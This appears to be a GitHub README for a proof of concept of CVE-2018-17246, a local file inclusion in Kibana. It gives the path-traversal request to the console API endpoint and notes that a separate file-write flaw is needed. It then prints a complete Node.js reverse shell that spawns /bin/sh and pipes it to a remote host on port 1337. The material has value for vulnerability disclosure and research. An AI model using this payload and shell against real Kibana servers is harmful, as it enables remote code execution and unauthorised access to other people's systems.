Skip to content
CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
Branch: master
Clone or download
mpgn Merge pull request #1 from chooper/chooper/add-helpful-tip
Add a helpful note about node.js module caching
Latest commit 4e657eb Oct 26, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

A Local File Inclusion on Kibana found by CyberArk Labs, the LFI can be use to execute a reverse shell on the Kibana server with the following payload:

/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

As you already guessed, this attack need to be paired with an unrestricted file upload or any other vulnerability that allows you to write a file on the server.

There is no input validation so we can change the name of the JavaScript file to anything we want. In this case, with the path traversal technique, we can choose any file on the Kibana server. One thing to be aware of, however, is node's module caching feature. Essentially, since the LFI works by sending unsanitized user input to node's require function, the included module (the attacker's payload) will be cached by filename. This means that you cannot send the same payload to, e.g., recover a reverse shell.

lfi

Vulnerability details: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Security Advisory: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
You can’t perform that action at this time.